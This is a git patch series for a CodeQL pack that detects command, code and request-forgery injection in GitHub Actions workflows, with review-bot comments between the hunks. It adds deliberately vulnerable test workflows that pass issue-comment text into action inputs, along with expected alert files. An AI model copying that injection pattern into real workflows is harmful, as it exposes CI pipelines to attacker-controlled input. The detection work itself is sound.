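Review bot: `externallyDefinedSink` takes `kind` as a free-form string and has no QLDoc, so a caller that passes a kind no `sinkModel` row uses gets an empty sink set with no diagnostic, which is how CodeInjection.ql ended up matching `"request-forgery"` earlier in this series. Add a doc comment above the predicate, e.g. `/** Holds if sink is an argument or in-scope env var of a uses step that a sinkModel row marks as a sink of the given kind. */`, and list the kind strings the models actually use. The widened parameter type (`DataFlow::Node`) appears not to change what is matched, because both branches still bind `sink.asExpr()`. The predicate body continues past the end of this hunk.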
diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 5d418ec1816..dddbd142873 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index bc2dbffdcdf..3bac9cec348 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -15,6 +15,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 2a1e4388d24..64d8a6e4328 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -15,6 +15,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index d665a368991..228c94f383b 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index df8c6ddf9cd..5395fe82453 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -315,6 +315,9 @@ scopes sources | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | | ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | +| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title | +| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch | +| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details | | dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml new file mode 100644 index 00000000000..4b6888449c0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -0,0 +1,9 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: ruby/setup-ruby@v2 + with: + ruby-version: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected new file mode 100644 index 00000000000..decabad082f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected 
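Review bot: The new CWE-078 fixture comment_issue.yml has a single positive case on `on: issue_comment`, so CommandInjection.expected and CriticalCommandInjection.expected later in this patch are identical apart from the message text, and nothing exercises the trigger check that separates the two queries. Add a second workflow in the same test directory whose trigger should keep the critical query silent while the plain query still reports, and a step with a constant `ruby-version:` to pin the no-alert case. A first-line comment such as `# Intentionally vulnerable test fixture for the CWE-078 queries` would also keep the file from being mistaken for a real workflow.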
@@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref new file mode 100644 index 00000000000..e38b88f2919 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected new file mode 100644 index 00000000000..8a3d19402b7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | 
diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref new file mode 100644 index 00000000000..ceb027c8058 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/CriticalCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected new file mode 100644 index 00000000000..4ef832d9d22 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref new file mode 100644 index 00000000000..fe9adbf3b64 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected new file mode 100644 index 00000000000..697cf2a310e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected 
@@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref new file mode 100644 index 00000000000..05ef02c5094 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index aa9d9ae2fc4..8236c4d7829 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -3,7 +3,6 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -64,15 +63,10 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | 
@@ -201,14 +195,10 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | 
diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index d4fd27b18d4..f852a1b5981 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -3,7 +3,6 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -64,15 +63,10 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | 
@@ -202,14 +196,10 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml new file mode 100644 index 00000000000..6937467453b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -0,0 +1,10 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: octokit/request-action@v2 + with: + route: ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected new file mode 100644 index 00000000000..d980139bb35 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | 
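Review bot: The new CWE-918 fixture `.github/workflows/test.yml` contains only a flagged case, so `RequestForgery.expected` pins that the tainted `route:` is reported but not that an untainted one is left alone. A second job whose `route:` is a constant string would make an over-broad sink model show up as a test diff. A leading comment such as `# Intentionally vulnerable fixture for Security/CWE-918/RequestForgery.ql` would also keep the file from being mistaken for a real workflow.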
diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref new file mode 100644 index 00000000000..fcb4e41daf8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -0,0 +1 @@ +Security/CWE-918/RequestForgery.ql From 92dbceb5070bc70b09c182385461ba6f7e056592 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 10:19:08 +0100 Subject: [PATCH 0121/1267] boost pack versions --- ql/lib/qlpack.yml | 8 ++++---- ql/src/qlpack.yml | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a0f348977ab..d211b8fc2ba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,12 +2,12 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.1 +version: 0.0.2 dependencies: - codeql/controlflow: ^0.1.7 - codeql/yaml: "*" + codeql/controlflow: "*" + codeql/dataflow: "*" codeql/util: "*" - codeql/dataflow: ^0.1.7 + codeql/yaml: "*" dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index aff53d45dde..61ef9d40ab5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.1 +version: 0.0.2 groups: - actions - queries From a36ae6a7e2eec938a81ae1a4b54273e81e5b5bea Mon Sep 17 00:00:00 2001 From: Jorge 